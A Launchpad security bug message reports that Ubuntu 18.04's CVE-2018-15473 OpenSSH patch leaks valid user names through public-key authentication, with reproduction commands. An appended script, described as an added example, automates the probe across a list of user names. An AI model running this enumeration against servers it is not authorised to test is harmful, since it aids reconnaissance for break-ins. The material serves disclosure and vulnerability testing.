[Bug 1934501] Re: CVE-2018-15473 patch introduces user enumeration vulnerability
Marc Deslauriers
1934501@bugs.launchpad.net
Thu Aug 12 13:06:58 UTC 2021
** Information type changed from Private Security to Public Security
https://bugs.launchpad.net/bugs/1934501
Title:
CVE-2018-15473 patch introduces user enumeration vulnerability
Status in openssh package in Ubuntu:
Fix Released
Bug description:
I was recently using an 18.04 machine and noticed that the result of
connecting to ssh with an arbitrary public key varied depending on whether the
user was valid.
After some investigation, it appears to only be present when
CVE-2018-15473.patch has been applied.
Directly pulling an 18.04 Docker image and installing openssh-server
(currently 1:7.6p1-4ubuntu0.3) results in a trivial user enumeration
vulnerability in the default config.
Below shows the setup of environment:
$ docker pull ubuntu:18.04
18.04: Pulling from library/ubuntu
Digest: sha256:139b3846cee2e63de9ced83cee7023a2d95763ee2573e5b0ab6dea9dfbd4db8f
Status: Image is up to date for ubuntu:18.04
docker.io/library/ubuntu:18.04
$ docker run -t -i --rm -e TERM=${TERM} ubuntu:18.04
root@75569fbf0b03:/# apt update
...snip...
root@75569fbf0b03:/# apt install openssh-server
...snip...
root@75569fbf0b03:/# dpkg-query -l openssh\*
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version Architecture Description
+++-========================================-=========================-=========================-=====================================================================================
ii openssh-client 1:7.6p1-4ubuntu0.3 amd64 secure shell (SSH) client, for secure access to remote machines
ii openssh-server 1:7.6p1-4ubuntu0.3 amd64 secure shell (SSH) server, for secure access from remote machines
ii openssh-sftp-server 1:7.6p1-4ubuntu0.3 amd64 secure shell (SSH) sftp server module, for SFTP access from remote machines
root@75569fbf0b03:/# mkdir /run/sshd
root@75569fbf0b03:/# /usr/sbin/sshd -D
Then, connecting with a public key results in user enumeration:
* in the following, id_rsa-dummy.pub is removed as it slightly changes the message flow
* I have not checked different versions of the ssh client
$ ssh -V
OpenSSH_8.2p1 Ubuntu-4ubuntu0.2, OpenSSL 1.1.1f 31 Mar 2020
$ ssh-keygen -t rsa -C dummy -P '' -f id_rsa-dummy
$ rm id_rsa-dummy.pub
$ ssh -i id_rsa-dummy invalid@172.17.0.2
Connection closed by 172.17.0.2 port 22
$ ssh -i id_rsa-dummy root@172.17.0.2
root@172.17.0.2's password:
That is, when invalid users are provided to public key auth the
connection is closed by the server. Otherwise, it will move on to the
next auth method. This can be improved by adding
"ssh -o PasswordAuthentication=no" when connecting, to avoid the password
prompt and get an easy-to-script error message.
I have verified that this behaviour is present after starting with
original source and only applying CVE-2018-15473.patch from the
openssh_7.6p1-4ubuntu0.3.debian.tar.xz archive. Without this patch
this behaviour is not present.
$ md5sum openssh-7.6p1.tar.gz debian/patches/CVE-2018-15473.patch
06a88699018e5fef13d4655abfed1f63 openssh-7.6p1.tar.gz
6101d47f542690b0c5e354ec8b8a70a1 debian/patches/CVE-2018-15473.patch
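The probe described in the bug report, scripted, as an added example that is not part of the report or of OpenSSH: a POSIX shell script that offers only public-key authentication for each candidate name (password and keyboard-interactive disabled, as the report suggests) and sorts the client's stderr into the two outcomes the reporter saw, "Connection closed by ..." versus a move to the next method. The host, port, key path, user names and script name below are placeholders; the "Permission denied (...)" text is assumed to be what a standard OpenSSH client prints when every offered method is refused (the report mentions the scriptable message but does not quote it).

```shell
#!/bin/sh
# Added example, not part of the bug report: script the probe described
# above to test an sshd for the public-key user-enumeration side channel.
#
# Assumptions (mine, not stated in the report):
#  - an OpenSSH client is on PATH and a throwaway private key such as the
#    report's id_rsa-dummy exists (generated with ssh-keygen; .pub removed)
#  - "Permission denied (...)" is the client's stderr text when every
#    offered method is refused, as standard OpenSSH clients print

# classify_ssh_stderr STDERR_TEXT
# Map the client's stderr onto the two outcomes the report distinguishes:
#   closed  - the server dropped the connection (invalid user in the report)
#   denied  - the server went on to the next method and refused it (valid user)
#   unknown - anything else (unreachable host, host-key problem, ...)
classify_ssh_stderr() {
    case "$1" in
        *"Connection closed by"*) echo closed ;;
        *"Permission denied"*)    echo denied ;;
        *)                        echo unknown ;;
    esac
}

# verdict RESULT...
# Given one classification per probed name, report whether the server's
# response actually differed between names. Returns 1 when it did.
verdict() {
    v_closed=0; v_denied=0
    for v_r in "$@"; do
        case "$v_r" in
            closed) v_closed=1 ;;
            denied) v_denied=1 ;;
        esac
    done
    if [ "$v_closed" = 1 ] && [ "$v_denied" = 1 ]; then
        echo "LEAK: response distinguishes valid from invalid users"
        return 1
    fi
    echo "no difference observed across these names"
    return 0
}

# probe_user HOST PORT KEY USER
# One attempt offering only public-key auth. BatchMode and the disabled
# password/keyboard-interactive methods mean the client never blocks on a
# prompt, so the outcome depends on the user name alone.
probe_user() {
    p_err=$(ssh -p "$2" -i "$3" \
        -o BatchMode=yes \
        -o PubkeyAuthentication=yes \
        -o PasswordAuthentication=no \
        -o KbdInteractiveAuthentication=no \
        -o StrictHostKeyChecking=no \
        -o UserKnownHostsFile=/dev/null \
        -o ConnectTimeout=5 \
        "$4@$1" true 2>&1 >/dev/null)
    classify_ssh_stderr "$p_err"
}

# enumerate HOST PORT KEY USER...
# Probe each name, print "name result", then give the verdict.
enumerate() {
    e_host=$1; e_port=$2; e_key=$3; shift 3
    e_results=""
    for e_u in "$@"; do
        e_r=$(probe_user "$e_host" "$e_port" "$e_key" "$e_u")
        printf '%-20s %s\n' "$e_u" "$e_r"
        e_results="$e_results $e_r"
    done
    # word-splitting the result list into verdict's arguments is intended
    verdict $e_results
}

# Usage (hypothetical host and names), mirroring the report's session:
#   sh probe.sh 172.17.0.2 22 id_rsa-dummy root invalid daemon nobody
if [ "$#" -ge 4 ]; then
    enumerate "$@"
fi
```

The verdict only says that the server's response differed between the names tried; include at least one name that certainly exists (root) and one that certainly does not, as the report does, otherwise every probe lands in the same class and the check cannot tell a fixed server from an unlucky wordlist.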